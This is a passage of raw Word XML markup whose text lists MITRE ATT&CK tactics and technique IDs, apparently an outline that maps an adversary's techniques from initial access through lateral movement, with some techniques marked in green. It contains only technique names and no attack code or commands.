        </w:rPr>
        <w:t xml:space="preserve"> &lt;Develop Capabilities&gt;:Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCFD30F"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1091', 'T1078', 'T1566.002', 'T1566.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE0D378"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1091 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Replication Through Removable Media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421D8786"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E4ECEF"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T1566.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46624AB7"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62740D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1566.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0062740D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062740D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062740D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D929AC"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution ['T1204.001', 'T1047', 'T1059.007', 'T1059.005', 'T1059.003', 'T1059', 'T1204.002', 'T1559.002', 'T1059.001', 'T1053.005']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D207822"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T1204.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ADA995" w14:textId="77777777" w:rsidR="00DF1D2D" w:rsidRPr="00770F8D" w:rsidRDefault="00DF1D2D" w:rsidP="00DF1D2D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00770F8D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00770F8D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1047 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00770F8D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows Management Instrumentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4FB56F"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T1059.007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F04A47"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5A37A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1059.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A37A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Visual Basic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475E4F4C" w14:textId="77777777" w:rsidR="00DF1D2D" w:rsidRPr="005A37A5" w:rsidRDefault="00DF1D2D" w:rsidP="00DF1D2D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A37A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1059.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A37A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0814F7B8"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1059 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Scripting Interpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277010E8"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62740D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1204.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0062740D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11455D90"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T1559.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Inter-Process Communication&gt;:Dynamic Data Exchange</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D232984"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T1059.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FC7C61"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493C5D65" w14:textId="77777777" w:rsidR="00DF1D2D" w:rsidRPr="00DF1D2D" w:rsidRDefault="00DF1D2D" w:rsidP="002D4E96">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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence ['T1078', 'T1543.003', 'T1547.001', 'T1546.011', 'T1053.005']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD7C276"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4BE962" w14:textId="77777777" w:rsidR="00DF1D2D" w:rsidRPr="00AD02C9" w:rsidRDefault="00DF1D2D" w:rsidP="00DF1D2D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A03F97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1543.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A03F97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create or Modify System Process&gt;:Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E451723" w14:textId="77777777" w:rsidR="00DF1D2D" w:rsidRPr="00A03F97" w:rsidRDefault="00DF1D2D" w:rsidP="00DF1D2D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A03F97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A03F97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A03F97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A03F97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B957EF1"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T1546.011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Event Triggered Execution&gt;:Application Shimming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6133CCAC"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AD02C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD02C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3FDCB2"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation ['T1078', 'T1543.003', 'T1547.001', 'T1546.011', 'T1053.005']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0255F4"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A861D0"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T1543.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create or Modify System Process&gt;:Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BD18E4"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T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F70C2BD"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T1546.011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Event Triggered Execution&gt;:Application Shimming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EB9EC9"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51373B7E"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0005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion ['T1078', 'T1036.005', 'T1497.002', 'T1553.002', 'T1027', 'T1218.005', 'T1036.004']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF22CA3"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA73737"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T1036.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Match Legitimate Name or Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FE1632"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T1497.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Virtualization/Sandbox Evasion&gt;:User Activity Based Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A62E24"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T1553.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Subvert Trust Controls&gt;:Code Signing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1044FAD7"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1027 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4157C2D4"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T1218.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5EDA05BF"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T1036.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Masquerade Task or Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1B5C35"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0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access ['T1558.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAD45B4"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T1558.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Steal or Forge Kerberos Tickets&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kerberoasting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B57EC53"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery ['T1497.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4711EF23"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T1497.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Virtualization/Sandbox Evasion&gt;:User Activity Based Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160FFA64"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement ['T1091', 'T1021.005', 'T1210', 'T1021.001', 'T1021.004']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E059EA6"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1091 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Replication Through Removable Media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A43BB8"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T1021.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
